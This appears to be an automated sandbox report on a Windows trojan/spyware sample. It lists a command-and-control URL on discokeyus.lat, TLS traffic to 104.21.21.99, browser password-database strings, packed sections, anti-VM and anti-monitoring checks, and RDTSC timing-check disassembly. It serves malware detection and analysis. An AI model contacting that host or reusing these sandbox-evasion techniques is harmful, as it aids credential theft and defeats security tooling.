Source: NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api
Source: NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apilat/J
Source: NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apio
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616874817.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616874817.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49729 version: TLS 1.2

System Summary

Source: NAliwxUTJ4.exe | Static PE information: section name: (empty)
Source: NAliwxUTJ4.exe | Static PE information: section name: .idata
Source: NAliwxUTJ4.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00EE1410
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E5A364
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E808E7
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E822C7
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E8228E
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E82BE6
Source: NAliwxUTJ4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: NAliwxUTJ4.exe | Static PE information: Section: (empty) ZLIB complexity 0.9973980629280822
Source: NAliwxUTJ4.exe | Static PE information: Section: speiiqif ZLIB complexity 0.9946216844627226
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: NAliwxUTJ4.exe, 00000001.00000003.2563874706.00000000054BA000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2586764821.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562710921.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2586889885.00000000054CE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: NAliwxUTJ4.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File read: C:\Users\user\Desktop\NAliwxUTJ4.exe
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Section loaded: version.dll
Source: NAliwxUTJ4.exe | Static file information: File size 1861120 > 1048576
Source: NAliwxUTJ4.exe | Static PE information: Raw size of speiiqif is bigger than: 0x100000 < 0x19e200

Data Obfuscation

Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Unpacked PE file: 1.2.NAliwxUTJ4.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;speiiqif:EW;suzusvsz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;speiiqif:EW;suzusvsz:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: NAliwxUTJ4.exe | Static PE information: real checksum: 0x1cccfc should be: 0x1d2879
Source: NAliwxUTJ4.exe | Static PE information: section name: (empty)
Source: NAliwxUTJ4.exe | Static PE information: section name: .idata
Source: NAliwxUTJ4.exe | Static PE information: section name: (empty)
Source: NAliwxUTJ4.exe | Static PE information: section name: speiiqif
Source: NAliwxUTJ4.exe | Static PE information: section name: suzusvsz
Source: NAliwxUTJ4.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_054AFD88 push es; ret 1_3_054AFD89
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E5CF4E push eax; iretd 1_3_00E5CF51
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E5CF52 push eax; iretd 1_3_00E5CF55
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E804CB push eax; retf 1_3_00E804D9
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00E840A0 push ds; retf 1_3_00E840A2
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Code function: 1_3_00ECD5D1 push es; iretd 1_3_00ECD5D2
Source: NAliwxUTJ4.exe | Static PE information: section name: (empty) entropy: 7.9808008709140585
Source: NAliwxUTJ4.exe | Static PE information: section name: speiiqif entropy: 7.953421574141461

Boot Survival

Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3D0D second address: 5B3D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3D15 second address: 5B3D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA84h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3D2E second address: 5B3D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEBD8FBE236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3D38 second address: 5B3D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3FD5 second address: 5B3FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3FDE second address: 5B3FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3FE2 second address: 5B3FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3FE8 second address: 5B3FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B3FEE second address: 5B3FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B821C second address: 5B82FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEBD887DA76h 0x0000000a popad 0x0000000b pop ebx 0x0000000c xor dword ptr [esp], 35192E6Ah 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FEBD887DA78h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1E0Bh], eax 0x00000033 jmp 00007FEBD887DA7Eh 0x00000038 call 00007FEBD887DA87h 0x0000003d jns 00007FEBD887DA7Ch 0x00000043 pop esi 0x00000044 push 00000003h 0x00000046 add ecx, 25611EE0h 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FEBD887DA78h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 sbb edx, 4CD76F67h 0x0000006e push 00000003h 0x00000070 mov edi, ebx 0x00000072 call 00007FEBD887DA79h 0x00000077 jmp 00007FEBD887DA89h 0x0000007c push eax 0x0000007d jmp 00007FEBD887DA88h 0x00000082 mov eax, dword ptr [esp+04h] 0x00000086 pushad 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B82FF second address: 5B8349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEBD8FBE236h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FEBD8FBE241h 0x00000011 pop esi 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 jne 00007FEBD8FBE245h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jne 00007FEBD8FBE23Ch 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B8349 second address: 5B8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 or ecx, dword ptr [ebp+122D35F3h] 0x0000000f mov esi, eax 0x00000011 lea ebx, dword ptr [ebp+124540B2h] 0x00000017 mov edi, ebx 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FEBD887DA7Ah 0x0000001f push eax 0x00000020 jo 00007FEBD887DA9Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEBD887DA7Bh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B83FD second address: 5B84CE instructions: 0x00000000 rdtsc 0x00000002 js 00007FEBD8FBE24Eh 0x00000008 jmp 00007FEBD8FBE248h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FEBD8FBE241h 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D1E5Ch], esi 0x0000001c push 00000000h 0x0000001e call 00007FEBD8FBE248h 0x00000023 adc edx, 4AF7BEFCh 0x00000029 pop edi 0x0000002a push 5946A625h 0x0000002f push ecx 0x00000030 pushad 0x00000031 js 00007FEBD8FBE236h 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a pop ecx 0x0000003b xor dword ptr [esp], 5946A6A5h 0x00000042 push 00000003h 0x00000044 pushad 0x00000045 clc 0x00000046 jns 00007FEBD8FBE23Ch 0x0000004c popad 0x0000004d push 00000000h 0x0000004f jnc 00007FEBD8FBE248h 0x00000055 push 00000003h 0x00000057 push 00000000h 0x00000059 push ebx 0x0000005a call 00007FEBD8FBE238h 0x0000005f pop ebx 0x00000060 mov dword ptr [esp+04h], ebx 0x00000064 add dword ptr [esp+04h], 00000017h 0x0000006c inc ebx 0x0000006d push ebx 0x0000006e ret 0x0000006f pop ebx 0x00000070 ret 0x00000071 push C443ADFCh 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 ja 00007FEBD8FBE236h 0x0000007f pushad 0x00000080 popad 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B84CE second address: 5B84D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B84D4 second address: 5B8533 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0443ADFCh 0x0000000f mov ecx, ebx 0x00000011 jmp 00007FEBD8FBE245h 0x00000016 lea ebx, dword ptr [ebp+124540BBh] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FEBD8FBE238h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 stc 0x00000037 pushad 0x00000038 mov dl, 24h 0x0000003a mov edx, 70C26026h 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 jp 00007FEBD8FBE236h 0x0000004a pop ebx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B8687 second address: 5B868D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B868D second address: 5B86AA instructions: 0x00000000 rdtsc 0x00000002 je 00007FEBD8FBE238h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jne 00007FEBD8FBE238h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5B86AA second address: 5B86AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D5B2F second address: 5D5B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D5DE3 second address: 5D5DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D5DE9 second address: 5D5DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D5DF5 second address: 5D5DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D605F second address: 5D6065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6065 second address: 5D6082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEBD887DA88h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6082 second address: 5D6087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6087 second address: 5D6098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FEBD887DA76h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6098 second address: 5D609C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D637D second address: 5D6386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D64E1 second address: 5D6516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEBD8FBE236h 0x0000000a jmp 00007FEBD8FBE23Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FEBD8FBE243h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6516 second address: 5D6520 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEBD887DA7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D696A second address: 5D6974 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6AAC second address: 5D6AB6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD887DA82h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6AB6 second address: 5D6ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6ABC second address: 5D6AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
